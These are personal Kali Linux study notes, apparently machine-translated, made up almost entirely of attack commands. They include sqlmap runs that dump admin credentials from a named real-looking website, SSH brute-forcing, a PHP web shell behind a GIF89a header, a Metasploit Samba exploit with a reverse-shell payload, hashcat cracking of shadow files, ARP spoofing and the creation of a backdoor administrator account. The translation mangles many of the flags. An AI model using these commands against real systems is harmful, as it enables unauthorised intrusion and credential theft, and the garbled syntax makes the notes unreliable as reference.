Kali_linux Study Notes

[Email protected]:~ #apt-get Install < software name >//install new software
[Email protected]:~ #apt-get Remove < software name >/uninstall Software

Medusa-h 10.10.5.246-u root-p pass.txt-m ssh

Crunch 1 3-o aa.txt
Locate Wordlist
Searchsploit OpenSSL
/usr/share/sqlmap/txt/wordlist.zip

Sqlmap-u http://www.cowinbio.com/about/index.php?id=1--dbs--current-user
Sqlmap-u http://www.cowinbio.com/about/index.php?id=1--dbms mysql-d CW--tables
Sqlmap-u http://www.cowinbio.com/about/index.php?id=1--dbms mysql-d cw-t admin--columns
Sqlmap-u http://www.cowinbio.com/about/index.php?id=1--dbms mysql-t admin-c user,pwd--dump
Sqlmap-u http://www.cowinbio.com/about/index.php--cookie id=1--table--level 2
Sqlmap-u http://www.cowinbio.com/about/index.php?id=1--dbms MySQL--tamper tamper/charunicodeencode.py-v 3
Sqlmap-g inurl:php?id=
--post Login Box Injection
Sqlmap-r search-test.txt-p Tfupass
Sqlmap-u http://www.cowinbio.com/login.asp--forms
Sqlmap-u http://www.cowinbio.com/login.asp--data "Tfuname=1&tfupass"
Sqlmap Request Delay:
Sqlmap-u http://www.cowinbio.com/login.asp--delay 1
Sqlmap-u http://www.cowinbio.com/login.asp--safe-freq 3
Bypass the WAF firewall:
Nikto-host http://www.cowinbio.com/about/index.php?id=1 Find Background
Https://www.exploit-db.com/google-hacking-database/google-hacking-database
Setoolkit set social engineering attack

OpenVAS user:admin passwd:82207a15-be87-4ef7-a171-dbde81ef9ae9 https://127.0.0.1:9392
Nessus Service NESSUSD Start https://127.0.0.1:8834
gif89a
<? @system ($_get["cmd"]);?>
www.fleurlis.com.tw

Http://www.wooyun.org/bugs/wooyun-2016-0224790/trace/94cba88d12cef35cdeb898f26d4bdda9

[Email protected]:~# msfconsole-x] Use exploit/multi/samba/usermap_script;\
Set RHOST 172.16.194.172;\
Set PAYLOAD cmd/unix/reverse;\
Set Lhost 172.16.194.163;\
Run

Hashcat-m 1800-a 0-o cra.txt shadow/usr/share/sqlmap/txt/wordlist.txt password hack

Like setting--custom-charset1=?l?d? 1 for lowercase letters and numbers, then 8-bit random numbers and lowercase letters can be written as 1?1?1?1?1?1?1?1, complete examples:
Hashcat test.txt-a 3-m 0--custom-charset1=?l?d? 1?1?1?1?1?1?1?1
Like setting--custom-charset2=xiao106347, then? 2 represents all possible combinations of the string consisting of X i a o 1 0 6 3 4 7, complete example:
Hashcat test.txt-a 3-m 0--custom-charset2=xiao106347? 2?2?2?2?2?2?2?2
Hashcat-m 0-a 3-o ee1.txt test.hash--custom-charset1=xiao--custom-charset2=?d? 1?1?1?1?2?2?2?2

The first step, Kali Linux 2.0 itself has built-in Metasploit,kali 2.0 has no Metasploit this service, so service Metasploit start does not work.
The MSF approach to starting with database support in Kali 2.0 is as follows:
#1 start the PostgreSQL database first:/etc/init.d/postgresql start, or service PostgreSQL start;
#2 Initialize the MSF database (key steps!) ): Msfdb init;
#3 running Msfconsole:msfconsole;
#4 View the database connection status in MSF: Db_status.
Done
Db_rebuild_cache

Crunch Dictionary password generation
Crunch 6 8 1234567890-o W1.txt
Crunch 10-t @@@@@@@0728-o W2.txt
Crunch 8 8-f/usr/share/rainbowcrack/charset.txt mixalpha-o w3.txt

ARP spoofing:
Ettercap-i eth0-tq-m arp:remote/10.10.4.11//10.10.7.34/

CMD Add User:
NET user Luozt Luozt/add
net localgroup Administrator Luozt/add

IP forwarding: Echo 1 >/proc/sys/net/ipv4/ip_forward

Kali_linux Study Notes